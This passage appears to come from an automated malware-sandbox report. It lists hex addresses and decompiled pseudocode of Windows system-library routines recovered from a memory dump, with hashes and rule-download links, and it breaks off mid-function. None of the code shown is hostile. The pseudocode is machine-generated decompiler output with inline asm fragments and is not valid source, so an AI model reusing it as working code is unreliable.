0x05105351
0x05105356
0x0510535a
0x05105360
0x05105363
0x05105366
0x05105369
0x05105369
0x0510536b
0x0510536b
0x05105370
0x051053a3
0x051053a4
0x051053a6
0x051053ab
0x051053ab
0x051053ae
0x051053ae
0x051053b5
0x051053bf
0x051053bf
0x05105375
0x05105396
0x051053a0
0x051053a0
0x00000000
0x05105396
0x05105377
0x05105379
0x0510537f
0x0510538c
0x05105390
0x00000000
0x05105390
0x051051ee
0x051051f1
0x05105301
0x05105310
0x05105315
0x05105318
0x0510531b
0x05105320
0x0510532e
0x05105331
0x00000000
0x05105331
0x05105328
0x05105329
0x00000000
0x05105329
0x051051fa
0x05105235
0x05105236
0x05105239
0x0510523f
0x05105240
0x05105241
0x05105242
0x05105246
0x05105247
0x0510524e
0x05105251
0x05105267
0x05105269
0x0510526e
0x0510527d
0x0510527e
0x05105281
0x05105282
0x05105287
0x05105288
0x0510528a
0x0510528f
0x05105294
0x00000000
0x00000000
0x0510529a
0x0510529c
0x0510529e
0x0510529e
0x051052a4
0x051052b0
0x00000000
0x00000000
0x051052ba
0x051052bc
0x051052bc
0x051052d4
0x051052d9
0x051052dc
0x051052e1
0x00000000
0x00000000
0x051052e7
0x051052f4
0x00000000
0x051052f4
0x05105270
0x00000000
0x05105270
0x051051fc
0x051051fd
0x05105202
0x05105203
0x05105205
0x0510520a
0x0510520f
0x00000000
0x00000000
0x0510521b
0x05105226
0x0510522b
0x0510521d
0x0510521d
0x05105222
0x05105222
0x0510522d
0x00000000

Strings

Legacy, xrefs: 05105226
UEFI, xrefs: 0510521D

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 3a2d72b7d4fd1685238c2f992b9f2ca4de3e22968f271be8f90a263635c7fe44
Instruction ID: e5d2f9e4b9e9a148000fe57d8afddaa9f6725cf50f8f1f494eced7d9db259a85
Opcode Fuzzy Hash: 3a2d72b7d4fd1685238c2f992b9f2ca4de3e22968f271be8f90a263635c7fe44
Instruction Fuzzy Hash: 4B516B71E04609EFDB24DFA8D984AAEBBBABF48700F15442DE549EB291D7B19900CF10

Uniqueness

Uniqueness Score: -1.00%

Function 050AB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E050AB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x517d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E050A7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05158CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E050C9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E050CB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E050CCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E050A7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05158F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E050CAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x5178628; // 0x0
								_v68 = _t77;
								_t78 =  *0x517862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x5178628; // 0x0
							_t116 =  *0x517862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x050ab94c
0x050ab956
0x050ab95c
0x050ab95e
0x050ab964
0x050ab969
0x050ab96d
0x050ab96d
0x050ab970
0x050ab974
0x050ab97a
0x050abadf
0x050abadf
0x050abae2
0x050abae4
0x050abae6
0x050abaf0
0x050f2cb8
0x050abaf6
0x050abaf6
0x050abaf6
0x050abafd
0x050abb1f
0x050abb1f
0x050abaff
0x050abb00
0x050abb00
0x050abb03
0x050abb03
0x050abacb
0x050abacf
0x050abad0
0x050abad1
0x050abadc
0x050abadc
0x050ab980
0x050ab980
0x050ab988
0x050ab98b
0x050ab98d
0x050ab990
0x050ab993
0x050ab999
0x050ab99b
0x050ab9a1
0x050ab9a5
0x050ab9aa
0x050ab9b0
0x050ab9bb
0x050ab9c0
0x050ab9c3
0x050ab9ca
0x050ab9cc
0x050ab9cf
0x050ab9d3
0x050ab9d7
0x050aba94
0x050aba94
0x050aba98
0x050abaa3
0x050f2ccb
0x050abaa9
0x050abaa9
0x050abaa9
0x050abab1
0x050f2cd5
0x050f2cdd
0x050f2cdd
0x050ababb
0x050ababc
0x050abac2
0x050abac3
0x050abac3
0x050abac6
0x00000000
0x050ab9dd
0x050ab9dd
0x050ab9e7
0x050ab9e7
0x050ab9ec
0x050ab9ec
0x050ab9f1
0x050ab9f5
0x050ab9fa
0x050aba00
0x050aba0c
0x050aba10
0x050aba10
0x050aba12
0x050aba18
0x00000000
0x00000000
0x050abb26
0x050abb26
0x050aba1e
0x050aba1e
0x050aba23
0x050aba25
0x050aba2c
0x050aba30
0x050aba35
0x050aba35
0x050aba41
0x050aba46
0x050aba4c
0x050aba50
0x050aba54
0x050aba6a
0x050aba6e
0x050aba70
0x050aba74
0x050aba78
0x050aba7a
0x050aba7c
0x050aba8e
0x050aba90
0x050aba92
0x050abb14
0x050abb14
0x050abb16
0x050abb16
0x00000000
0x050aba7c
0x050abb0a
0x050abb0d
0x00000000
0x00000000
0x00000000
0x050abb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 050AB9A5

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 7b80c912f3fd6b14ad7d7ae6afe37bc51a7ad1e43b4ecc471e4589a0c7bfb13b
Instruction ID: 3fc4608ff11430a715529f2e3e2e2d4648df2bf90a4d58e45237752481d4f589
Opcode Fuzzy Hash: 7b80c912f3fd6b14ad7d7ae6afe37bc51a7ad1e43b4ecc471e4589a0c7bfb13b
Instruction Fuzzy Hash: 39516972A18341DFC720CFA9E48492EBBF6FB98610F14896EF99587344D771E840CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0508B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0508B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x515f7a8);
				E050DD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E050DD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E050CD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E050CF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L050DDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E050CB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E050CB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E050CE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E050CA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0508b171
0x0508b171
0x0508b171
0x0508b171
0x0508b171
0x0508b176
0x0508b17b
0x0508b180
0x0508b186
0x0508b18f
0x0508b198
0x0508b1a4
0x0508b1aa
0x050e4802
0x050e4802
0x050e4805
0x050e480c
0x050e480e
0x0508b1d1
0x0508b1d3
0x0508b1de
0x0508b1de
0x050e4817
0x050e481e
0x050e4820
0x050e4822
0x050e4822
0x050e4824
0x050e4824
0x050e482a
0x00000000
0x00000000
0x050e4835
0x050e483a
0x050e483d
0x050e483f
0x050e4842
0x050e4842
0x050e4842
0x050e4846
0x050e484c
0x050e484e
0x050e4851
0x050e4851
0x050e4853
0x050e4854
0x050e4854
0x050e4858
0x050e485a
0x050e485a
0x050e485d
0x050e485f
0x050e4861
0x050e4861
0x050e4866
0x050e486b
0x050e486e
0x050e4871
0x050e4876
0x050e4876
0x050e4878
0x050e487b
0x050e4884
0x050e4884
0x00000000
0x050e487d
0x050e487d
0x050e4882
0x050e4889
0x050e4889
0x050e488f
0x050e4891
0x050e48e0
0x050e48e2
0x050e48e4
0x050e48e4
0x050e48e7
0x050e48e7
0x050e48ed
0x050e48f4
0x050e48f6
0x050e4951
0x050e4951
0x050e4953
0x050e4953
0x050e4956
0x050e4956
0x050e4958
0x050e4959
0x050e4959
0x050e495d
0x050e495d
0x050e495f
0x050e495f
0x050e4965
0x050e4969
0x050e49ba
0x050e49ba
0x050e49c1
0x050e49c5
0x050e49cc
0x050e49d4
0x050e49d7
0x050e49da
0x050e49e4
0x050e49e5
0x050e49f3
0x050e4a02
0x00000000
0x050e4a02
0x050e4972
0x050e4974
0x00000000
0x00000000
0x050e4976
0x050e4979
0x050e4982
0x050e4983
0x050e4984
0x050e498b
0x050e498d
0x050e4991
0x050e4993
0x050e4999
0x050e499d
0x050e49a2
0x050e49a2
0x050e49a2
0x050e4999
0x050e49ac
0x00000000
0x050e49b3
0x050e48f8
0x050e48fe
0x00000000
0x00000000
0x00000000
0x050e48fe
0x050e4895
0x050e489c
0x050e48ad
0x050e48b2
0x050e48b5
0x050e48b7
0x050e48ba
0x050e48bc
0x050e48c6
0x050e48c6
0x050e48cb
0x050e48d1
0x050e48d4
0x050e48d8
0x050e48d8
0x00000000
0x050e48d8
0x050e48be
0x050e48c0
0x00000000
0x00000000
0x050e48c2
0x00000000
0x00000000
0x00000000
0x050e48c4
0x00000000
0x050e4882
0x050e487b
0x050e4904
0x050e4906
0x00000000
0x00000000
0x050e4908
0x050e490e
0x00000000
0x00000000
0x050e4910
0x050e4917
0x050e4917
0x00000000
0x050e4917
0x0508b1ba
0x050e47f9
0x050e47fc
0x00000000
0x00000000
0x00000000
0x050e47fc
0x0508b1c0
0x0508b1c0
0x0508b1c3
0x0508b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 050E48AD

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 37b9f306daa2ea19ca6dd7b6818f680bdf20faddbf11990cb82d4b366e37f563
Instruction ID: cacb1d16b0072635d4f5f4db4f5d475dcd4522014986e0557d11b623e856b76b
Opcode Fuzzy Hash: 37b9f306daa2ea19ca6dd7b6818f680bdf20faddbf11990cb82d4b366e37f563
Instruction Fuzzy Hash: 1B51FE71E002598EEF31CF68E944BBEBBF2BF01710F2441ADE899AB281D7755945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 050BFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E050BFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0509EEF0(0x5177b60);
					_t134 =  *0x5177b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x5177b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x5177b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E05096D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E050976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05128938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0508B150();
													}
													_t116 = E05126D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E050975CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x5178638; // 0x336ee00
																	_t122 = L050938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E050976E2(_t154);
																			goto L41;
																		}
																	} else {
																		E050976E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L050BFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L050970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E050BFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E050BFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E050BFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E050BFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E050BFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x5177b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x5177b84 = _t75;
						_t73 = E0509EB70(_t134, 0x5177b60);
						if( *0x5177b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0509FF60( *0x5177b20);
							}
						}
						goto L5;
